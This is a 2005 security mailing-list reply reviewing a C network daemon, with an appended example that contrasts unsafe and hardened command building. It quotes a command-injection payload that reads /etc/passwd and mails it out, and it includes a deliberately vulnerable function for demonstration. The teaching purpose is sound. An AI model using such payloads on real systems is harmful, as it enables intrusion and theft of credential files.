On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cuéllar Valdés wrote:

> Marc, thanks that was the problem !!!
>
> sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big
> big big mistake

It certainly was.

> I added the whole path to the instructions:
>
> sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
>
> Thanks to all of you who helped me !! :-)

You daemonize. You open a socket. You read input from that socket - carefully avoiding buffer overflows - then you run the command:

  /usr/local/bin/say -s 4 -a "the text you read"

Firstly, you don't avoid a simple buffer overflow. Although your two buffers, 'buffer' for receiving the message from the network and 'message' for running the command, are both the same size, you don't account for the extra characters when you're copying:

  sprintf(message, "say -s 4 -a \"%s\"", buffer);

At least change that to:

  snprintf(message, sizeof(message), "say -s 4 -a \"%s\"", buffer);

Secondly, and this is the biggie, you don't quote or process the characters which are read from the network. Consider what would happen if a malicious user sent this:

  "; cat /etc/passwd | mail [EMAIL PROTECTED] ; echo "

You would run this command:

  /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""

Effectively you're allowing any user who can connect to your server to execute arbitrary commands. If this is started by init you're likely running as root too.

Check that the characters you read from the network are only [a-zA-Z ] and you're probably OK.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
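The two defects Steve describes, the unbounded sprintf and the unfiltered shell metacharacters, side by side with a hardened version. This is an added example and not code from the original poster's daemon or from the thread; the buffer sizes and function names are assumptions, and the final function goes one step beyond the [a-zA-Z ] whitelist the mail recommends by dropping the shell altogether and exec'ing /usr/local/bin/say with the text as a single argv entry. The injection payload is constructed from the one quoted in the mail; it is only formatted into a string here, never run.

```c
/* Constructed example (not the original daemon). Buffer sizes are assumed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define BUF_SIZE 256   /* assumed size of both 'buffer' and 'message' */

/* The original pattern: network input formatted straight into a shell command
 * line. Returns what would be handed to system()/popen(); never executes it.
 * snprintf only bounds the copy; it does nothing about the metacharacters. */
int build_say_command_unsafe(const char *buffer, char *message, size_t msglen)
{
    return snprintf(message, msglen, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
}

/* Whitelist check from the mail: accept only [a-zA-Z ]. Quotes, ';', '|',
 * '$', backticks, newlines and everything else are rejected outright. */
int say_input_is_clean(const char *buffer)
{
    for (const unsigned char *p = (const unsigned char *)buffer; *p; p++) {
        if (!(isalpha(*p) || *p == ' '))
            return 0;
    }
    return 1;
}

/* Hardened builder: whitelist first, then bounded formatting with truncation
 * detection (the fixed prefix alone is 28 bytes, so 'message' must be larger
 * than 'buffer' or the copy can still be cut short).
 * Returns 0 on success, -1 if the input is rejected, -2 if it would not fit. */
int build_say_command_safe(const char *buffer, char *message, size_t msglen)
{
    if (!say_input_is_clean(buffer))
        return -1;
    int n = snprintf(message, msglen, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
    if (n < 0 || (size_t)n >= msglen)
        return -2;
    return 0;
}

/* Better still: no shell at all. The text becomes one argv element, so no
 * quoting rules apply and no metacharacter is ever interpreted. Keeps the
 * whitelist anyway, since 'say' itself may not like arbitrary bytes.
 * Returns -1 if rejected, -2 if fork fails, otherwise the child's exit status
 * (127 if /usr/local/bin/say cannot be executed). */
int run_say_no_shell(const char *buffer)
{
    if (!say_input_is_clean(buffer))
        return -1;
    char *const argv[] = { "/usr/local/bin/say", "-s", "4", "-a", (char *)buffer, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -2;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127);
    }
    int status;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -3;
}

int main(void)
{
    /* Constructed payload, modelled on the one quoted in the mail. */
    const char *evil = "\"; cat /etc/passwd | mail someone ; echo \"";
    char message[BUF_SIZE];

    build_say_command_unsafe(evil, message, sizeof message);
    printf("naive daemon would run: %s\n", message);
    printf("whitelist verdict: %d\n", build_say_command_safe(evil, message, sizeof message));
    printf("clean text verdict: %d\n", build_say_command_safe("hello world", message, sizeof message));
    printf("-> %s\n", message);
    return 0;
}
```

The whitelist is the quick fix; the exec-without-shell path is the durable one, because it stays safe even if someone later relaxes the allowed character set to let punctuation through.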